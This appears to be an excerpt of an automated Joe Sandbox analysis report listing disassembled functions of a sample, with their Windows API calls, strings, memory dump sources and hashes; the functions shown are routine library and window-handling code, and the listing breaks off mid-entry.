Function 005096FE Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 197windowCOMMON

Download Yara Rule

APIs

IsRectEmpty.USER32(?), ref: 005098D3
IsWindowVisible.USER32(?), ref: 0050991E

Strings

c, xrefs: 0050974F
c, xrefs: 00509810
Dc, xrefs: 00509724

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: EmptyRectVisibleWindow
String ID: Dc$c$c
API String ID: 3084472430-3725593719
Opcode ID: aca9dccd26f999edaddcbb185aaa2e5a25e5d3ca5c0156e9a76e4f9ac31f9649
Instruction ID: 689935e61cf02f8e2e55a3f1ddf74a19f36a49d57acb43c56165277024d79020
Opcode Fuzzy Hash: aca9dccd26f999edaddcbb185aaa2e5a25e5d3ca5c0156e9a76e4f9ac31f9649
Instruction Fuzzy Hash: C2716A71A002069FDB14DF65C889BAE7BF9FF4A710F140069E905EB296DB359C41CBA1

Function 004E465E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,00000000,9E026D90,?,?,?,?,005EADE0,000000FF), ref: 004E4714
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,?,?,005EADE0,000000FF), ref: 004E4750
RegCloseKey.ADVAPI32(?,?,?,?,?,005EADE0,000000FF), ref: 004E476B
GetPrivateProfileStringW.KERNEL32(?,?,?,?,00001000,?), ref: 004E47D4

Strings

X*b, xrefs: 004E47B3

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: QueryValue$ClosePrivateProfileString
String ID: X*b
API String ID: 1042844925-1362717254
Opcode ID: 04314f8f073744976dacfb1278bc136d170044a2da215b105cab859d0944949a
Instruction ID: e8bad35bfd9ecbd5ae2168a8124a9c1b33f1d91a79ff3e9b2964d3fb3afc34bd
Opcode Fuzzy Hash: 04314f8f073744976dacfb1278bc136d170044a2da215b105cab859d0944949a
Instruction Fuzzy Hash: 3F418F71D00328DBCB259F15CC4C9AEBBB9EB49314F0001DBF509A2292CB345E99DFA5

Function 005B2B0B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110stringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32(?), ref: 005B2B27
lstrlenW.KERNEL32(?,?,005A7946,?,?), ref: 005B2B71
_wcslen.LIBCMT ref: 005B2B9B

Strings

FyZ, xrefs: 005B2C10

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: GlobalLock_wcslenlstrlen
String ID: FyZ
API String ID: 2647411976-4262810165
Opcode ID: ee6146d9cf83ade155f1a452b78d81a69ef38d0f362e3a1ddcedd609c84e8a0e
Instruction ID: 968d2dc811fcc92569c72c557aabf6e36dfe0c283de7ffa198ac13e1ea92ae46
Opcode Fuzzy Hash: ee6146d9cf83ade155f1a452b78d81a69ef38d0f362e3a1ddcedd609c84e8a0e
Instruction Fuzzy Hash: A841C371900216EFCB18DF64C8859BEBBB9FF04304F14896AE816E7241DB34AE45CBA0

Function 004D7450 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004D746A

Part of subcall function 005E858E: std::exception::exception.LIBCMT ref: 005E85A3
Part of subcall function 005E858E: __CxxThrowException@8.LIBCMT ref: 005E85B8
Part of subcall function 005E858E: std::exception::exception.LIBCMT ref: 005E85C9

std::_Xinvalid_argument.LIBCPMT ref: 004D74A7

Part of subcall function 005E8541: std::exception::exception.LIBCMT ref: 005E8556
Part of subcall function 005E8541: __CxxThrowException@8.LIBCMT ref: 005E856B
Part of subcall function 005E8541: std::exception::exception.LIBCMT ref: 005E857C

_memmove.LIBCMT ref: 004D7508

Strings

invalid string position, xrefs: 004D7465
string too long, xrefs: 004D74A2

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 1615890066-4289949731
Opcode ID: f98a71729b1930f7101992a1d270b2ab0a6508941b36833d795cfc379db3f734
Instruction ID: e05de3aef1f4cdf83fceb9cc388462b695100005d58492c4de9d2673abbcf126
Opcode Fuzzy Hash: f98a71729b1930f7101992a1d270b2ab0a6508941b36833d795cfc379db3f734
Instruction Fuzzy Hash: 7C31EB333086105BD7219E5CF860A6EFB99EBA1764F20052FF145CB381EA65DC4087A9

Function 004DC886 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

GetMenuCheckMarkDimensions.USER32 ref: 004DC89E
_memset.LIBCMT ref: 004DC916
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 004DC978
LoadBitmapW.USER32(00000000,00007FE3), ref: 004DC990

Strings

, xrefs: 004DC8F7

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
String ID:
API String ID: 4271682439-3916222277
Opcode ID: c8985dea229ac135af88caa4a1855a692c12203e523672038c5b9facd7b6c492
Instruction ID: 6a0861c0b3ed5a25b025c4a33a576d4ea07bd9c6536e762c9eb18f81f470d4c7
Opcode Fuzzy Hash: c8985dea229ac135af88caa4a1855a692c12203e523672038c5b9facd7b6c492
Instruction Fuzzy Hash: A4312771A002199FEB208F689CD5BB97BB5FB45350F4540ABF549E7381DE388D88DB50

Function 00508E9E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000011), ref: 00508EB5
GetCursorPos.USER32(?), ref: 00508EFB
SetRectEmpty.USER32(?), ref: 00508F11
IsRectEmpty.USER32(?), ref: 00508F3B

Strings

c, xrefs: 00508EE1

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: EmptyRect$CursorState
String ID: c
API String ID: 2369637639-2927717585
Opcode ID: 8e50470ee168e7b37ee8c8529a523d25dddbc879c3d701f3d3629f41011ac895
Instruction ID: 1a08b12f7bf0acccf16ba19b3ddf1d8f6bd502f0b4d5d9854f229d70ed56fedc
Opcode Fuzzy Hash: 8e50470ee168e7b37ee8c8529a523d25dddbc879c3d701f3d3629f41011ac895
Instruction Fuzzy Hash: 1D212C71A0021EABCF11EFA5CC859FEBBBDFB48740B10046AF505E2240DB759A45DBA1

Function 0055CC1F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0055C4B3: _memset.LIBCMT ref: 0055C4C4
Part of subcall function 0055C4B3: GetParent.USER32(?), ref: 0055C4E4

_memset.LIBCMT ref: 0055CC70
_memcpy_s.LIBCMT ref: 0055CC86
SendMessageW.USER32(?,00000438,00000000,?), ref: 0055CCA2
_memcmp.LIBCMT ref: 0055CCB7

Part of subcall function 004DACC7: __CxxThrowException@8.LIBCMT ref: 004DACDD

Strings

Pw`, xrefs: 0055CC4F

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: _memset$Exception@8MessageParentSendThrow_memcmp_memcpy_s
String ID: Pw`
API String ID: 3974188246-3190913483
Opcode ID: 87c68ae29e2bf14e95465accba7468afbdd5ed03b5d52f546080775500036fd4
Instruction ID: f8764e2c0097931508fa0ba4ba04a6f7ebfa7da7ba9c6a3adff4f6e6c6987f5d
Opcode Fuzzy Hash: 87c68ae29e2bf14e95465accba7468afbdd5ed03b5d52f546080775500036fd4
Instruction Fuzzy Hash: FD1178B2E00309ABDB10EFE5CC56FAF7778FB45714F10042AB615E7281DA74A905CB54

Function 0052234F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00522391
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 005223CC
OffsetRect.USER32(?,?,?), ref: 005223DC
CopyRect.USER32(?,?), ref: 005223EA

Strings

,, xrefs: 005223A5

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$CopyInfoOffsetParametersSystemWindow
String ID: ,
API String ID: 401166719-3772416878
Opcode ID: 69e1d7352c1bd3861ca4e6c96c6474ad41479649d5815ffabc93075aaee47891
Instruction ID: 382a7035606dd1aba2ec5ab0e55bcf303b0ed71044cac6b31253fee3dad75198
Opcode Fuzzy Hash: 69e1d7352c1bd3861ca4e6c96c6474ad41479649d5815ffabc93075aaee47891
Instruction Fuzzy Hash: 1C214776A00219ABCF14EBE4DC48FAEBBB9FF48310F14042AF101E7190DB74A905CB61

Function 0053EE1A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

Edit, xrefs: 0053EE74

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID:
String ID: Edit
API String ID: 0-554135844
Opcode ID: d2596ad5e1fc78b575eddbfd28fdb835c9da566091d65d90ebd0106a50cc8d7d
Instruction ID: d52f9c36bbdc6daf4817e0fd6414a7b1972afb81bb55912e839258ab94088ba5
Opcode Fuzzy Hash: d2596ad5e1fc78b575eddbfd28fdb835c9da566091d65d90ebd0106a50cc8d7d
Instruction Fuzzy Hash: 94118E31204202A7EE2027768C0BB7ABFEEBB50751F244829F915D24E0DF75EC58F654

Function 00514652 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 56libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(COMCTL32.DLL), ref: 0051466E
GetProcAddress.KERNEL32(00000000,TaskDialogIndirect), ref: 0051467E
_memset.LIBCMT ref: 00514697

Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22

Strings

COMCTL32.DLL, xrefs: 00514669
TaskDialogIndirect, xrefs: 00514678

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: AddressException@8H_prolog3HandleModuleProcThrow_memset
String ID: COMCTL32.DLL$TaskDialogIndirect
API String ID: 2638756577-244319309
Opcode ID: 07b448c66a1cc95d7118edf4ec90ce7c2e98141e21fd43d4ea720b527078470a
Instruction ID: a22db8295b4b2119d64d9052dd2ea1af0273d2f97b721f37436aa5b9e8dc4936
Opcode Fuzzy Hash: 07b448c66a1cc95d7118edf4ec90ce7c2e98141e21fd43d4ea720b527078470a
Instruction Fuzzy Hash: 23117372900309ABDB10DBA4CC49FDE7BFCBB45714F104526B505E7180EB74DA84CB95

Function 004D70B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 004D70DF
std::exception::exception.LIBCMT ref: 004D7118

Part of subcall function 005CCB3D: std::exception::_Copy_str.LIBCMT ref: 005CCB58

__CxxThrowException@8.LIBCMT ref: 004D712D

Part of subcall function 005CF7E9: RaiseException.KERNEL32(004DA2E2,?,00000000,?,004DA2E2,?,?,004D106C,00000000), ref: 005CF82B

std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 004D7134

Strings

\*b, xrefs: 004D7111

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: std::_$Copy_strExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
String ID: \*b
API String ID: 73090415-1446036122
Opcode ID: 89ccd23b2267828aa3e53390bc64c6a93e5887999c6b8a35f60b888ef8b3a5ce
Instruction ID: d09af09dd6dd5bf63d07330e5d336db137e1a15b161e757827b547b7aeb00f02
Opcode Fuzzy Hash: 89ccd23b2267828aa3e53390bc64c6a93e5887999c6b8a35f60b888ef8b3a5ce
Instruction Fuzzy Hash: 8711B2B2804789AFC720DF99C881A9AFFF8FB15300F40866FE55993741D734A604CBA5

Function 004F0FC6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(DWMAPI), ref: 004F0FF0
GetProcAddress.KERNEL32(00000000,DwmSetIconicThumbnail), ref: 004F1000
DeleteObject.GDI32(00000000), ref: 004F103A

Strings

DwmSetIconicThumbnail, xrefs: 004F0FFA
DWMAPI, xrefs: 004F0FE5

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: AddressDeleteHandleModuleObjectProc
String ID: DWMAPI$DwmSetIconicThumbnail
API String ID: 3128169092-3761315311
Opcode ID: 895fc8abe49795d1ce40698f1953406d35c726c9eccc683655628080383c845b
Instruction ID: f611860f6d4c8092a26f30a3ac98b5caaaa7902e23745827a830bbc57faeeb27
Opcode Fuzzy Hash: 895fc8abe49795d1ce40698f1953406d35c726c9eccc683655628080383c845b
Instruction Fuzzy Hash: 93016D75600349BFDB105B668C88ABBB6ADFF48754F00412AFA11D7252DFBCD940D7A8

Function 004ECFA9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 46libraryfileloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004ECFBD
GetProcAddress.KERNEL32(00000000,CreateFileTransactedW), ref: 004ECFCD
CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 004ED00C

Strings

CreateFileTransactedW, xrefs: 004ECFC7
kernel32.dll, xrefs: 004ECFB8

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: AddressCreateFileHandleModuleProc
String ID: CreateFileTransactedW$kernel32.dll
API String ID: 2580138172-2053874626
Opcode ID: 8094817bfe080e1f2872dcfef6274557377441d6980614f6bf3b17749b617e35
Instruction ID: cfcbbe5a1140e844780f280d114bd43999934e7a3e797e52bbee26f8abd06e5b
Opcode Fuzzy Hash: 8094817bfe080e1f2872dcfef6274557377441d6980614f6bf3b17749b617e35
Instruction Fuzzy Hash: 7201CC3250054AFBCF220F969C04CAB7E36FB98B65B184615FA2591160C73A8862FBA5

Function 004E18F6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 004E191F
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 004E192F

Part of subcall function 004E18A2: GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 004E18B6
Part of subcall function 004E18A2: GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 004E18C6

Strings

RegDeleteKeyExW, xrefs: 004E1929
Advapi32.dll, xrefs: 004E191A

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Advapi32.dll$RegDeleteKeyExW
API String ID: 1646373207-2191092095
Opcode ID: 2798b9e1c80aa177170f9d62417dd9caa78ca6653a0f5331ec5b3a29c01a0356
Instruction ID: e5baa979b3ab41a5053daf3cdd08aff4e6d8afa5f37ef20931d7141a4039674d
Opcode Fuzzy Hash: 2798b9e1c80aa177170f9d62417dd9caa78ca6653a0f5331ec5b3a29c01a0356
Instruction Fuzzy Hash: 1BF0DCB9240280BFDF245F52EC48B667FA6BB14742F00042AF54AD2272CB3A9950EB59

Function 00528CA1 Relevance: 7.8, APIs: 5, Instructions: 346windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00528CA8
GetWindow.USER32(?,00000005), ref: 00528D4D
SendMessageW.USER32(?,00000229,00000000,00000000), ref: 00528D68
GetParent.USER32(?), ref: 00528ECC
SendMessageW.USER32(?,00000222,00000000,00000000), ref: 005290A5

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: MessageSend$H_prolog3_ParentWindow
String ID:
API String ID: 3554438227-0
Opcode ID: 2458c0ac92c192f3ca0465968f9a7607f1287687a4c0bf3faec95c6380cc3d83
Instruction ID: a8b0b8c0df86d3aaa47e7dcee7bf1b26bac26f77588d24bfaffda25049daf05d
Opcode Fuzzy Hash: 2458c0ac92c192f3ca0465968f9a7607f1287687a4c0bf3faec95c6380cc3d83
Instruction Fuzzy Hash: A8D19870A01218DFCF14EBE5D899BBDBBB9BF48319F14012EE506AB2D1DB785905CB44

Function 004F8C75 Relevance: 7.8, APIs: 5, Instructions: 338COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 004F8C9D
SetRectEmpty.USER32(?), ref: 004F8D15
